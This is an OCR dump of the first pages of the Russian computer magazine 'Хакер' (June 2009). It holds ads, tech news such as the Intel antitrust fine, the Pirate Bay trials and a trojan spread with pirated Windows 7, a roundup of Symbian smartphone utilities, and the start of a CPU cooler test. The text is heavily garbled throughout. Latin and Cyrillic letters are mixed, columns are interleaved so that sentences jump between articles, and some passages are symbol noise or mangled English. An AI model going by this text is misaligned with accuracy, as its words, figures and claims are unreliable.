хакер_6_2009

  • Uploaded by: Leopold Beautiful
  • 0
  • 0
  • May 2020
  • PDF

This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA


Overview

Download & View хакер_6_2009 as PDF for free.

More details

  • Words: 69,318
  • Pages: 142
www.comsys.Гu

[ • -----~

СОМВУ8 I'1ЮFI

comsys@comsys.гu г. Краснодар, ул. Красная,д.18О тел.lфакс:

(861) 251-84-84

и

(861) 215-18-70

НАДЕЖНОСТЬ ПРОВЕРЕННАН ВРЕМЕНЕМ

11

КОМПЬЮТЕР

COMSYS

НА БАЗЕ ПРОЦЕССОРА INTEI® CORE™

fnref,ln1el Core Quad ЯВl1ЯЮТСЯ товарными знаками. либоэзрегистрированными'Jоварными ::IH
~Rofi 2

QUAd

права на которые прмнадлежат корпорации

Intel

ми ее подразделениям на территории США м друrкх стран.

Корпорация rntel не несет ответственность и не осуществГ\яет проверку добросовестности иГ\и достоверности каких-Г\ибо утверждений иГ\и эаявГ\ений относитеГ\ьно конкретных компьютерных систем, упоминание о которых содержится в данном документе.

© 2009 г. Celeron, Сеlегоп Ins,de, Сепtппо. Centrlno Inslde. flОГОТиП Cen1flno, Соге Inside, iIOготип Репtiuгп. Pentium Inslde, V,iv Inside, vPro Все права защищены РеКl\а~1а.

Inside, Хеоп,

Iпtеl, Intel, lmel Соге, Iпtеllпsidе,flОГОТИП Intellnslde, Iпtеl ViIV, Intel \IРщltаПlum, Itanium \nside. и Хеоп IПSldе яв!\яются товаРНЫI~И знака~IИ права на которые принад~,ежат корпорации Intel на территоplo1И США и других стран.

Ноут6укдляшкольников

ИСLудентов

Компания Dеllанонсировала

обстоит следующим образом: про­

ноутбук на базе чипсета lпtеl's

цессор IntelAtom

945GSE. ориентированный на

1.6 ГГц; до 1 ГБ оперативки [плюс

«учебной сегмент рынка»­

дополнительный слот, с возмож­

модель

Latltude 2100 Понимая

особенности аудитории.

I

N270 частотой

ностью рвсширения памяти до

2 ГБ]; LED-экран 1024х576, или

Dell

оснастили машинку прорезинен­

опциональный тачскрин; жесткий

ным корпусом, который позволит

диск емкостью до 250 ГБ. или SSD

избежать царапин и других ме­

дО

ханическихповреждений [этому

адаптер; WIFh-\одуль. и, наконец,

'16 ГБ; гигабитный сетевой

поспособствуети отсутствие

кард-ридер 3-в-1 для SD\MMC

вентиляционныхотверсщй на

карт. Также на выбор пользовате­

нижней стороне Kopnycaj, клави­

лю предоставяттри разных ОС­

атурой с антибактериальным пок­

Windows ХР Ноте. Windows Vista

рытием и опциональным ремнем

или Liпuх UЬuпtu. Окончательная

для переноски на плече. Цветовых

цена ноутбука, разумеется, будет

решений будет

зависеть от комплектации, но уже

5: красный. жел­

тый, синий, зеленый и графито­

известно, что минимальная его

вый. Техническая же сторона дела

стоимость составит369 долларов.

_

........

"~_~~"



.•. ....-_..•• , •• _.,-. _.••

~_._-~'

... --r

. .

_~."

•.. _, __ •.••

,_.".w•...

Книга ЖЖалоб и

предлоЖЖений

~

,tQ:Q&lJ~.ОI']N; ... :fC.1:t-:·Ik~>I~lnCfО. ...

~~:Х>F.<-(!>,,~tSIl(Ij;t)

'" "8r.... L.~ or~ ...·· ~ "t'OC"".J~p~

~~~.:::~~-::=::--.­

--,., ....... ..........

­

_'
~~:s-=:::=':':-­

;:~~~-:!:=."-,

/'

/r;-'1"~ ...,.,~

,i(!/p.,~ "tf.-,I.

/,,", 1{V ~.;'/-" (J !' 'f"l СУ L 1 'n" ft· . )~. {~ '1

>,,-

.~,

~~

Мы уже писали отом, что президент рф

пришлось возлагать буквально к забору. Каково

Дм итри й АнатольевичМедведевтеп ерь ведет

же было всеобщее удивление, когда 15-го

блог не только на

числа на комментарий был дан ответ со сканом

kremlin.ru,

но и в ЖЖ. куда

дублируютсязаписи с правительственного

официального документа, подписанного

портала Но кто бы мог подумать, что президент

президентом РФ. Бумага содержала изначаль­

станет отвечать на ком менты В журнале, да еще

ный текст комментария-жалобы и следующую

как! После лразднованиядня Великой Победы,

приписку от руки: «А.Н. Ткачеву: Разберитесь.

1О-го мая. в блоге первого лица государс­

Накажите виновных. Доложите в трехдневный

тва появился комментарий. в котором юзер

срок». Дата, подпись. Пару дней спустя в пресс­

voda_IJyba жаловался на власти Краснодара

службе президента подтвердили, что поруче­

Из-за них вечный огонь в городе реконструи­

ние действительно было передано губернатору

руютуже более полугода, и вдень памяти цветы

Александру Ткачеву.

DDoS-атака в реале Страсти

BOKpyrThe Pirate Вау и не думают стихать. Хакеры со всего мира продолжа­

ют строить каверзы компаниям и организациямобвинителямтрекера, Пиратская партия Швеции из-за громкого процесса набрала невиданную мощь итеперь имеет все шансы пройти в Европарламент, противники копирайта активно протестуют, а сами админы ресурса держатся молодцом Так, Готфрид Свартхольм, уже и без

того известный миру как парень неробкого десятка (И,l.1енно он отвечал на гневные

письма правообладателей, не скрывая сарказма и ехидстваl, предложил устроить сообразную DDoS-атаку на адвокатскую фирму Danowsky

& Рагtпеrs.

Именно они

защищают интересы медиа-магна1·ОВ. Готфрид призвал народ, в знак «огромной

признательности» этим людям, перевести на их банковский счет

1 шведскую крону.

Вся соль в том, что после тысячи платежей банк начнет взимать с фирмы комиссию

за каждый последующий платеж, в размере

2 крон. Более того, обработка таких

«поступлений» В адвокатской конторе осуществляется вручную и сопряжена с

маранием кучи бумаг, а штату фирмы совсем небольшой. Но Свартхольму и этого показалось недостаточно. Особо ретивым борцам за справедливость он прецложил отозвать свой перевод обратноl Свою месть Готфрид окрестил просто

- «распреде­

ленной атакой на отказ вдолларах» или, сокращенно, DDo$-атакоЙ. Как в Dano\Nsky

& Part.ners справляются с таким

~

010

валом переводов, пока неизвестно.

XAI(EP 06 1'11.6/ 09

РС27

Фnешкасо

_..--.---­ Асе

\

\\.

\

\

встроенным антивирусом

\\

I(омпании

Transcend и Trend Micro решили радикальног;одойти к проблемезара­

жения компьютеровчерез флеш-наког;ители.Они собираются выпуститьфлешку

JetFLash V15 AntiVirus USB Flash Orive со встроенным антивирусом Т rend Micro USB Security. Девайс защитит от заражения и порчи какхранящиеся на нем данные, так и П К, к которому производится подключение. Встроенный антивирус проверит каждый передаваемыйфайл и в случае обнаружения малваря -

\'\

предупредит юзера и помес­

тит файлы на карантин. Флеш-драйв будет поставляться с уже предустановленным Т rend Micro USB Sесuпtу и бесплатным триалом на

90 дней.

Обновление антивирус­

ных баз будет производиться автоматически. 80 время подключений к компьютерус

\ \

выходом винтернет.

ПО ДАННЫМ ПРОЕКТАRUМЕТРИКА,

С_.' ~

440/0 РОССИЙСКИХ ЮЗЕ РОВ НЕ ГОТОВЫ

~ . •..

ПЕРЕСТАТЬ ЮЗАТЬ И-НЕТ, ДАЖЕ ЕСЛИ У НИХ

НЕ БУДЕТ ХВАТАТЬ ДЕНЕГ НА ЕДУ И ОДЕ}f{ДУ.

Им не нужна твоя одежда и Пока

отоцикл.

Пока в кинотеатрах крутят нового "Терминатора», где робо­ ты с людьми бьются за место под солнцем, роботы вполне "успешно» нападают на людей уже сегодня, и далеко не в кино. Например. в Швеции, еще в

2007 году. работник

Сток­

гольмской фабрики Больста едва не погиб, осуществляя техобслуживание поврежденной машины, использовав­

шейся для перетаскивания тяжелых камней. Будучи уверен, что робот отключен, рабочий оказался совсем не готов К тому, что машина внезапно схватит его за голову и попыта­

ется поступить с ней так, как обычно поступает с камнями. В результате инцидента мужчина получил серьезныетравlo-\Ы,

а частности, сломал четыре ребра и, согласно Io-\едицинским

заключениям, был действительно близок к Сlo-\ерти И 80Т, спустя два года, потерпевший все же решился подать в суд

и потребовал у СВОИХ бывших работодателей 25 000 крон 1$30001. Но более интересно то, что его иск удовлетв ори­ ли, а прокурор приэнался журналистам, что: "Никогда не слышал, чтобы робот вот та к на кого-нибудь нападал». И хотя понятно, что вданном случае речь идет о банальном

несоблюдении техники безопасности, а не о «восстании машин», такого рода «первые ласточки'> все равно выглядят неслишком приятно.

GOOGLE БОРЕТСЯ ЗА ЧИСТОТУ ОКРУЖАЮЩЕЙ СРЕДЫ, ПОЭТОМУ ВМЕСТО ГАЗОНОКОСИЛОКДЛЯ СТРИЖКИ ГАЗОНОВ, КОМПАНИЯ «ВЗЯЛА НА РАБОТУ»

200 ЖИВЫХ КОЗЛОВ.

~

012

ХАКЕР

06/126/ 09

ВУНИВЕРСИТЕТЕКАРНЕГИ­ МЕЛЛОНАВЫЯСНИЛИ,ЧТО ПОДОБРАТЬОТВЕТ

НА «СЕКРЕТНЫЙВОПРОС»

В

170/0 СЛУЧАЕВ СМОЖЕТ

ДАЖЕ НЕЗНАКОМЫЙ С «ЖЕРТВОЙ» ЧЕЛОВЕК.

ыймонитор

Смышnе

Новая серия мониторов от компании но носит приставку

LG ~ W5З. совершенно заслужен­

SMART. Full Н О дисплеи С разрешением 1920хl ова.

соотношением сторон экрана

16:9,

динамической контрастностью

50.000:1 и временем отклика 2 мс, оснащены такими функциями как Auto BГlght. Time Сопtгоl, Сiпегпа Mode и Live Sensor. ЭТО значит, что монитор будет способен автоматически регулироватьяркость и другие настройки картинки, в за8ИСИМОСТИ от степени освещенности комнаты,

или же в зависимости ОТ контента на экране Iчем темнее картинка, тем светлее экран, и наоборот]. Также стоит заметить. что эта опция существенно сократит расход энергии,

снижая интенсивностьлампы подсветки. Функция Сiпеmа

Mode поэ­

волит без проблем смотреть видео в онлайне, не отвлекаясь при зтом на яркую рекламу и другие раздражители

-

монитор автоматически

затемнит все, кроме выбранного об"Ьекта. Благодаря

T,me СопtгоL,

можно будет настроить специальный таймер, который раз в

1-2

часа

будет напоминать, что пора отдохнуть от работы эа компьютером И. наконец, сенсорная панель управления L,ve Sепsог автоматически распознает приближение руки и аКТИ8ируе'г подсветку на лицевой

панели монитора. облегчая по.иск кнопок. В серию войдут три модели:

W225ЗV[21.5"j. W225ЗТQ[21.5"j и W2'15ЗV!27"J. в Гlродаже мониторы появится уже В этом месяце, ОриеНТИРО80чнаяцена составит 80аа рублей.

Intelvs

АМО,6 продо

тва жает я

Конкуренция между «верными врагами» -

Inte!

Дурной пример

заразителен

ственности собрались итальянцы. Стоит

отметить, что бороться с трекером в Ита­

и АМО,

лии уже пытались

тогда провайдера м

-

похоже, может остаться в прошлом только В ОдНОМ

страны попросту приказали прикрыть к

случае, если одна из компаний прекратитсвоесущест­

нему доступ, но команда ТРВ обратилась

вование. Гиганты продолжаютрасстаВЛfПЬ капкан ы

в суд и оспорила незаконную блоки ров­

друг на друга, и срабатываютэти ловушки порой лишь

ку. Теперьже против админов трекера

спустя долгое время Так недавно «выстрелило ружье»,

собираются выдви нуть 'ге же обвинения,

висевшее на стене с

что совсем недавно звучали и в их родной

2000 года. Именно тогда предста­

вители АМО пожаловались Еврокомиссии, что

Швеции. Какие именно улики собираются

Intel.

якобы, приплачивает некоторым производителям, что­

Антипиратское лобби всех европ ейских

предъявлять итальянцы и как повернется

бы те отказывались от использования В своих продуктах

стран БУКGально ликуетпосле вынесения

ситуация, сучетом того, что ТРВ не имеет

чиповАМО. Было начато расследование, и закончилось

приговора поделу команды

оно лишь недавно. По его результатам Еврокомиссия

Вау Но некоторым, похоже, не терпится

совсем ясно. Какая-то кон кретика по этому

вынесла неутешительныйдля

повторить успех Швеции лично. Стало

вопросудолжна появиться вближайшие

известно, что теперь при влечь команду

пару месяцев, и тогда же станет известно,

многострадального трекера к ответ­

бытьли этому суду вообще.

Intel

вердикт ­

вину ком­

пании, очевидно, смогли доказать и приговорили

Intel к

штрафу в размере 1.060 миллиарда евро, за нарушение антимонопол ьного законодательства Евросоюза. Сумма штрафа является настоящим

peKopAotJ"

но совсем не

факт, Чl'О IпtеLдействительно придется платить. Для начала будет подана апелляция, эатем последует еще не одно судебное разбирательство, и ка ков будет окончательный итог, сказать крайне сложно. Президент

The Pirate

к Италии никакого отношения, пока не

НОВЫЙ [ридер

oTAmazon

АМО Дирк Мейер, однако, настроен оптимистически

Устройства для чтения электронных

Klnd!e2 [равно как и для его предшес­

и заявляет: «АМО была неуклонным лидером по части

книжекзавоевываютвнародевсеболь­

твенника] не существует, зарегистри­

технологических инноваций, и мы страмимся перейти

шую популярность, а спрос, как извес­

ровать устройство на

из мира, в котором правила корпорация Iпtеl, в мир, В

тно,рождаетпредложение.Компания

проблемно, а воспольэоваться WiFi и

котором правят потребители».

Amazon выпустила вторую версию своей

интернетом вне США не получится. Тем

читалки KlndLe

не менее, возможно. когда-нибудь мы

­ Amazon KindLe 2. Так

Amazon. сот тоже

ка к большинпво ридеров на сегодня

все же дождемся официальных продаж,

имеют экран

и тогда тебе пригодится информация о

6" с разрешением600х800,

чтение на них технической или учебной

TO~~, что цена на

литературы, а также комиксовдоволь­

$35900, а на 9.7" - $489.00.

6"

модель составляет

но затруднительно.Проиэводители, наконец, решили учесть этот нюанс

- Klndle2 вышел в двух вариантах, уже привычном 6-дюмовом и

9, 7-ДЮЙtJ.овом

!Кiпdlе OXI, с поддержкой POF. Экраны

E-Ink

последнего поко­

ления обеспечат передачу 16-ти оттенков серого, а разрешение

КiпdLе ОХ составит 1200х824. За счет скругления углов вторая

КОМПАНИЯ MCAFEE СООБЩАЕТ, ЧТО КОЛИЧЕСТВО IР-АДРЕСОВ, ИСПОЛЬЗУЕМЫХ

КDМПАМИ В БОТНЕТАХ,

УВЕЛИЧИЛОСЬДО МИЛЛИОНОВ.

12

инкарнация KindLe стала похожа

на большой

IPod. Также читалка

a~~o'I~1Ildle

.,i,j\i!!i~

р~.""",,&,,,,.ni(""Yf Тh'lS\ullblan Не­ WfI1 ~O'N

paH~nt:f WC~C $с)

1n

I.eмn1ni: iшw

WOf':'1ed,"

Ье

10 _talk.

"Му

latcr rcal1~d, ·'th.M

Ю!:,У

COMUlM а <10<:\0'1:: Е'(en :.fttr bc'had bc::1UD" u:nпg ...r~s.. somedm~ :lrt~f t!te II~ о! ~,k dМ!:10~ а qUltk тат pUlmptod the"'t3mll1~d. to dub ыт ·der De~rtt'.". tht' dopey on"t. ЗJld other5 }п ьь rami1,)' w laЪel bдn "'$ ":UmoF ~[ds.~ When~wr

bot""bl some\:hil)g .10 ~.

значительно «похудела» И обза­

hf IIfOU1d ~it outоnhirmiеll:wЬЩ>trringit.sofIi.у

велась джойстиком для навига­

"l:"~

ции и динамиками, расположен­

Ье up&.ttd 10 WmйU IOf~У"п~avinlJ'hJs Ilpt{lt

ными на задней части корпуса.

Внешней памяти устройство

uпШ

it iO\Inded ~ tllOVeb tl>ptonoun""i! a.loud. $t-l1ltn<:. ~ uttere
m.J

WOf$bipfu\

)'QUJфI $~1i!1 rt!CiilU~ ~ In"II", 110\11 .~ti_1

..,., .11 v-t"'/ wol1)jU80- sb-e пЮ. "Не та diftkulty witb tangщo3! diJlt· 1h~.;arotlDii fc:!ll't:d



$U~

Бiф

Ье Yюul3 ne\~r.l~m.·J

нk d.~ dt'V~I!?'pmetlt wu ц,m~ wi..Ш''J. с:Ьнky~Шо\М1ess tI1waI'd authod1;)', wblc!:lltd,

теперь не предполагает­

слот для SO-карт пропал. Внутреннюю память из-за этогоувеличилидо2-х и 4-х ГБ, в зависимости от модели В остальном изменений мало­

QQQQ0<:YG>0G>

(;)(~G)~<'wQQ0Ф

~ Q (v G?! ('G QG:J <& ~ QQGJG)W(~(,~G!»~ ®~( ..... _ 9)Q~

Кlпdlе был и остается продуктом, ориентиро­

ванным на США Офици­ альнойрусификациидля

~

014

;;: ХАКЕР

06 1126/ 09

С'

СТАТИСТИКА РАNDАSЕСURIТУУТВЕРЖДАЕТ, ЧТО 670/0 ПОДРОСТКОВ

в ВОЗРАСТЕ ОТ 15 до 18 ЛЕТ ХОТЬ РАЗ ПЫТАЛИСЬ ВЗЛОМАТЬ СВОИХ

ДРУЗЕЙ В СЕТИ.



Вести с попей разработки

57

о

I

Так как вся прогрессивная часть человечества

Damballa, зараженоуже порядка 30 тысяч машин. Так что, дорогой

уже тестирует реше-кандидат Windows

читатель, советуем качать Windows 7 с гтжгоsоit сот, а не иэ торрентов

7, вы­

ложенный в Сеть в начале мая, его, раэумеется,

Тем более, «мелкомягкие» любезно и совершенно бесплатно предоста­

не могли обойти вниманием вирусмэйкеры

вяттебе и сам дистрибутив, и серийник к нему, валидный до мая

и борцы с оными_ Недавно стало известно о

года. Ну а заодно можешь потестировать и новый продукт от Kaspersky

201 О

Lab - Kaspersky Anll-Virus В О для Windows 7. Совсем недавно началась

том. что вместе с одной из пиратских версий дистрибути ва распространяется троян, который орrанизует из компью­

бесплатная бета. которая должна продлиться полгода АНН1ВИ рус подой­

теРОЕ на баэеWiпdоws 7 RC ботнет Поданнымэкспертов компании

деткакдля бета, так и для RС-версии

у,И

тернет,

Технология Flash сегодня практически монопо­

ДН!

ог

выглядитболее чем Вfiушительно Среди ПрОИ3­

лист рынка. несмотря на наличие конкурентов_

водителей микросхемотметилисьBroadcom, Intel

Но компании Adobe, видимо, недостаточно того,

и SТМiсгоеlесtГОПIСS,а среди прочих napTfiepoB

что она прочно оккупировала П К и добралась

- Comcast, Disney/nteractlve и NewYork Times_

до смартфонов. Теперь в

Windows 7.

ПеРЕыетелеВИЗ0РЫ, поддерживающие Flash,

Adobe вспомнили

о существовани И другой техники - бытовой.

должны появиться В продаже уже к концу ЭТОГО

На конференции NAB Shоwпублике представили

года Благодаря ореп Framework, на ТВ можно

новую раэработку- Flash, опти~~иэированный

будет запуститьлюбоеиэ уже существующих

длятелевизоров, приставок и Blu-гауплееРО8.

Flаsh-приложекий,что обещаетоставить конку­

Коал иция, собирвющаяся n родвигать это в массы,

рентов далеко позади.

ASUS RT-N15 -

настройка

сети в одно касание! ./ Адаптировандля России ./ Утилита быстрой настройки

беспроводной сети

Беспрецедентнаяскорость для

вашей сети с техноnогиями

Gigabit Etheгnet и 802.11N ------------------<0

• W~FI 300

Мбит!с, поддержка 802 _11 п и

• 4 и

802,11 bIg

порта

'LAN Gigabit 1 порт WAN Gigabit

• ASUS Green Network Technology ­ эффективное расходование электро­ энергии и защита окружающей среды без потери производительности ASUS WL-130N

ASUS WL-160N' Компаl<ТНЫЙ US8 2.0

высокопроиз80дительный адаптер pel 802.11N

адаптер

В""мирная гара",ия 2 годв ди,,~иб""то~ы: БЮРОКРАТ

(4951 745-55-11: Koodoo

www.asus.ru

Горячая линия AS~: (495) 2З-U-999 Tec~nolo9i

.. ('95)

256-Н-31.

OLDI ('95) <2-11-111:

,c::au=. -

8D2.11N

ПИРИТ-Дистрибуция

(495} 974-3210;

TRINITY-ЕLЕСllЮNIСS

',""'.lri-,I."

••

Inspiring Innovation 'о Persisterlt Petiection

®

Мобильный чемоданчик хакера Телефон, компьютер, плеер, фотоаппарат -

маленький арсенал, который всегда

хочется иметь при себе. Но реально ли заменить его лишь одним компактным устройством, которое сможет пригодиться в любом месте в любое время? Легко!

Если это современный музыкальный смартфон с QWЕRТУ-клавиатурой, такой как

Nokia 5730 XpгessMusic.

--~O О

Когда много лет назад

которая сильно сковывает и огра­

Если тебе надо позеонить или

чать" Встроенная камера на

родители подарили мне

ничивает действия пользовате­

быстренько скинуть короткую

мегапикселя никогда не заменит

3

ля Зато, получив в распоряжение

SMS - нет ничего удобней TpaAI.1­

"зеркалку", нодля того, чтобы

Мб оперативки на борту, я и

полноценную QWЕRТУ-клаву, на

ционнойтелефоннойклавы,

заснять смешной момент или

подумать не мог. что девайс с на­

смартфоне МОЖClо делать все. что

НО стоит раскрыть боковой слай­

сделать видеоролик,

м ного большей мощностью будет

угодно.

дер, какутебя в руках оказывает­

то, В конце концов, платфор­

постоянно при мне, просто в кар­

Причем, если раньше полноцен­

ся полноценная

ма

мане джинсов Я говорю про свой

ной клавиатурой могли похва­

можешь набиратьтексты любой

редакции позволяетустановl.1ТЬ

смартфон. И все-таки, несмотря

литься толькотоповые модели

коммуникаторов на

длины [я даже успеваю записы­ ватьлекцииl, кодить на Python

кучу разных приложений, пре­

на внушительные характеристи­ ки, мы никогда не используем

Mobile састрономическими

или общаться в аське. Больше

униsерсальногосолдата, Праsда,

телефон как ко,mьютер

здесь важно не потеряться в раз­

первый

Pentium

1ЗЗ МГц с

8

но

Windows

клавиатура,

и ты

-

зто самое

Symblan самой последней

вращая Nokia

5730 XpressMusic в

ценниками, тотеперьза ВПОЛClе

того, прямо на лицееой панели

почему? Ведь есть операционка,

разумные деньги можно приоб­

имеются кнопки для управления

Hooбpaзии софта и устанавливать

есть программы для нее, и есть

рести Nokla

плеером и sкупе с3 Гб карточкой,

тол

И купить его есть за чтоl Главная

которая идет е комплекте, мы

еарианты. Но именно такие про­

мешает? По сути, единствен­

фишка телефона

получаем отличную замену iPod'y,

веренные нами утилиты мы тебе

ным сдерживающим фактором

фор,~-фактор, совмещающий в

которую в отличие от обычного

сейчас и посоветуем.

является неудобная клавиатура.

себе сразу две клавиатуры,

плеера всегда можно <<прока­

ресурсы для запуска

-

-

что же

5730 XpressMusic. -

уникальный

ько проверенные

О Грамотный

О Файловый менеджер

таск-менеджер

Для навигации по файловой системе твоего

Стандартный таск-менеджер, безусловно,

смартфона рекомендуем устаноаить класс­

О Видео-плеер

Любой пользовательWindows

Mobile хорошо

знаком сзамечательным проигрывателем

хорош. для обычного Г10льзователя. Если

ный фаЙЛОВЫI~ менеджер X-plore. Помимо

видео CorePlayer. Шустрый, безглючный и

же нужно поглубже заглянуть в систему, то

удобнейшего интерфеv,са, ты получишь в

очень удобный, он делает всех конкурентов

распоряжение поиск по имени файла или от­

на раз-два. Где еще найдешь плеер, который

придется поставить

JBak ТаskМап.

В итоге, ты получишь возможностьпро­ смотра списка процессов, потоков и блоков памяти, а также сможешьуправлять авто­

запуском и быстро переключатьсямежду

ры вку текста, встроенный аудио\в идео- плеер

проигрывает видео с любыми кодеками не

и просмотрщикизображений. Болеетого,

хуже чем компьютер с

нет быстрее способа передать нужный файл

сле приобретения смартфона на SуmЫап мне

через

было особенно приятно, что версия

BI.uetoolh

или

MMSI

О Мессенжер

О Удаленный админ

Несмотря нато, что нашатройкаоператоров,

В любое время и практически влюбом месте

наконец-то, сделала доступной функцию

ты нетолы<о можешь принять звонок или про­

"Чат», клиентдля аськи уже прижился на

верить почту, но и удаленно админитьлюбые

любом телефоне. Кто там возмутился по поводу

серваки.

самые разные протоколы, в том числе интере­

SSH ксвоим хостам можно PuTTYfor SуmЫап OS Если же тебя интересует RDP, то следует воспользоваться тутой TSMoblles.

сующие нас ICO, Jabbe~ и, конечно же, Google Talk. Оба клиенты хороши, причем у Sllck'a,

она без проблем запустится на

помимо всего прочего, есть отличная возмож­

XpressMuslC

SL!ck,

CorePlayer

О Управление через

Подключиться по

того, что iCQ давно не пользуется? Понимаю, и ил и

По­

есть идля этой платформы.

активными процессами.

позтому особенно рекомендуюутилиты

K-Lite Code Pack'oM?

Smaper

которые отл ич но поддержи вают

с помощью портированной версии

Кстати говоря, зта Jаvа-программа, но

Nokla 5730

ностьдля передачи фаЙЛО8 8 виде ссылок.

BLuetooth ЕО

Btuelool- утилита для удаленногоуправле­

ния компьютеромчерез Bluetoolh. Лично я

приспособилэту программукак пулыдис­ танционногоуправлениядля видео-плеера,

но тут все эависитот фантазии. Единственная загвоздка в том, что серверная часть про­

граммы написана на основе библиотеки

BTFramework и будет работатьисключительно со стандартнымидрайверами Windows для Bluelooth. Если ты установишьдрова с диска, который шел ствоимдонглом,или программу

---

Bluesoleil, то ничего не

получится.

-§~

-­~O О Распознавание музыки

5hazamID - зто одна из моихлюбимых программ для телефона, которой

О Безопасность

С появлением возможности редактировать файлы или удаленно кон­

я пользуюсь чутьли не каждый день. Идея простая I Если где-то в кафе,

нектиться к серверам, кданным на телефоне стоит относиться с особой

по радио да неважно, где еще, заиграла прикольная композиция, то

осторожностью. Небольшая тулза

можно очень просто узнать, что зто. Включаешь 5hazагпID

ключом зашифроватьлюбые папки или файлы. Теперь, чтобы открыть

-

'га запи­

Best

Cгypto позволит 256-битным

сы вает небол ьшой семпл, отправляет его на сервер и уже через пару

их, потребуется ввести пароль или сложную парольную фраэу. Другая

секунд, скорее всего, покажет тебе имя исполнителя, названиетрека и

утилита

даже обложку альбома I

безопасный РРТР-канал до VPN-сервера. А это, кстати, еще и способ

symvpn

поможет защитить данные от перехвата, устанавливая

сохранить анонимность.

О Разговаривай бесплатно

Ощутив раз всю жестокость международного [да и междугороднего роу­ мингаl, желание разговаривать в «чужой» СОТОВОЙ сети сильно притупля­

О Альтернативныйплеер

Если скины стандантного плеера, восьми эквалайзеров, способных

ется. Но когда в распоряжении есть смартфон с Wi-Fi, о подобных затратах

изменять звук до неузнаваемости, и вообще, 80 всех отношениях при­

можно забыть, уста н оаи в замечательную программу Fгiпg. Подкл ючив­

ятный плеер платформы

шись К ближайшему хот-с поту Iв кафешке или гостинице), 'ГЫ можешь

могупосоветоватьтолькоодно

[прежде всего, Skype) или звонки ПО любым номерам за сущие копейки

560 Featuгe Расk2тебя вдругне устраивает, - OggPlay. Помимо большого числа поддерживаемых форматов [новомодные ogg, .oga, .flac и, конечно же, .mp3i, у плеера есть еще две удобных опции. Первое - настраиваемые горячие клавиши. И второе - автоматический поиск файлов для вос­

\вплоть до бесплатных на городские в Москве и Питереl. Причем для

произведения 8 НУЖНОЙ папке, избавляющий от геморроя с составле­

тебя такой звонок ничем отличаться не будет, крометого, что весь трафик

нием плейлистов при каждой эагрузке новой музыки.

позвонить куда угодно, используя все возможности VoIP- телефонии. А что зто значит? Все просто: бесплатные звонки на такой же VolP-клиент

пойдет не через дорогостоящий

GSM, а

через

WI-FI.

I'ТЕМПЕРАТУРА. (

7'~

Zerotherm ZE,N FZ120 (1800 об/мин]

Zerotherm ZEN FZ120 1'1400 об/мин]

Xilence BLack Hawk Edition i 1400 об/мин)

Xilence Black Hawk Edition (1800 об/минl

Thermalright Ultra 120 extreme (1400 об/минl

Thermalright IFX-14 (2 вентилятора 1400 об/минl

Thermalright IFX-14!1 вентилятор 1400 об/мин

Noctua NH-(12P [1400 об/мин]

Ice Наттег 114-4405 (1650 об/мин]

Ice Ha'mmer IH-4405 !1400 об/мин]

о

5 1О 15 20 25 30 35 40 45 50

ХОЛОД

РЕШАЕТВСЕ

Сравнениеохлаждающихсистем для проц,ессоров

Качество укладки элементов в микросбарках и микросхемах непре­ рывно увеличивается, а вот большинство систем охлаждения до не­

давнего времени отставали в своем развитии. Пора наверстать упу­

щенное! Мы отобрали несколько разработок в этой области и рады представить их тебе. НЕСКОЛЬКО

ПО,КОЛЕНИЙ КУЛЕРОВ

всерьез задумались о снижении гютребляемой

крепления, габариты, теплоотвод и т.д,] дейс­

мощности, так как чисто экстенсивное развитие

твительно хорошо сбалансированы!

Еслиуж речь зашла о модернизациисистем

стало себя исчерпывать. Та же ситуация произош­

охлаждения,то полезно вспомнитьновей шую

лa скулерами

историю их развития, Начнем приблизительно

весьсистемный блок

-

делать вентиляторы размером с

- зто, всеже, глупость.

Phenom Х4 9950, у которого максимальная мощ­

года этаксдвухтысячного.Мощные кулеры стали

Примерно С

устанавливатьна процессоры InteL. начиная

ляться нововведения втехнике охлаждения.

с Репtium 111. Чуть раньше они появились на

Во-первых. жидкостные системы, как бо­

140 Вт. Отметим, что стенд. на котором ПРОVlЗ80­

разработках АМD.

лее тихие, эавоевали большее количество

дилось тесги рование, был открытым

каждого транзистора Icледовательно, и всего

ПОКГОННИКОG, нежели было прежде. Однако зто

случае мы отсекаем возможную дополнительную погрешносгъ, вызванную нагревом корпуса.

- поскольку энерговыделение

2006 года начинаютмассово появ­

МЕТОДИКА ТЕСТИРОВАНИЯ Для теста ~~ы взяли4-ядерныйпроцессорАМD

ность рассеивания соcrавляет приблизительно

- в этом

процессора! у них было больше, нежели у "пенти­

экзотика. В основном начали входить в жизнь

умов». Чуть позже они эту проблему испраВИЛI~.

более теплопроводные материалы; увеличива­

Конечно, термопаста существенно ВЛVlяетна

Изначально система охлаждения была проста,

лись площади радиаторов Iза счетуменьшения

отвод тепла, поскольку обладает собственным

как гвоздь - брался радиатор [как правило,

толщины пластин и увеличения их количества),

тепловым сопротивлением на границах сред(тем

алюминиевыйl и на негоустанавливался не·

применялись тепловодные трубки и пра виль­

не менее. оно меньше. чем тепловое сопротивле­

большой вентилятор. В принципе, общая схема

ная организация притока и оттока воздуха

ние раздела процессор-радиаторJ. Для объектив­

прослеживается и В сегодняшних ~юделях,

через корпус- раньше об этом если и думали,

ности мы использовали одну и туже пасту на всех

однако нынешние

то не сильно. И буквально год назад началVl

кулерах

тельны при сравнимых размерах

появляться модели, которые действительно

Самтестпроизводился утилитой S&M С помо­

Примерно в 2004 году начали появляться

можно назвать кулерами нового поколения

щью нее мы нагревали процессор втечениеЗО

кулеры-монстры, моду на которые стал задавать

В них большинство характеристик [материал,

- гораздо более производи­

Therma ltake. Одна ко а погеем стал, пожаЛУЙ, 2007- й.

Noctua NT-H1

минут. Тихие кулеры без регулировки вращения оцен ивались лишь в одном режиме, более

Примерно тогда же производители электрони ки

продвинутые

-

в двух: на максимуме и при ско­

Тестовый стенд:

рости в 1400 об/мин Выбор именно этой цифры

Процессор: АМD Phenom Х4 9950 Black Edition

объясняетс" тем, что на многих вентиляторах

Тестовое оборудование:

Системная плата: Foxconn A7DA-S (чипсет АМD

с переменными режимами работы эта частота

Ice Наттег IH-4405

790GX)

Thermalright IFX-14

Память, Мб:

вращения является минимальной

1024, модуль Corsair СМ2Х1024­

Тем пература сн ималась с внутриядерных датчи­

Thermalright Ultra-120 eXtreme

8500С5

ков процессора с помощью програ м мы

Хilепсе Black Hawk Еditiоп

Жесткий диск, Гб: 500,Samsung НD501 LJ

Everest. Естественно, отбирались максималь­

Zerotherm ZEN FZ120

Блок питания, Вт:

ные значения. Уровень шума оцеНVlвался,

Noctua NH-C12P

ХХХТестовыйстенд

~ 018

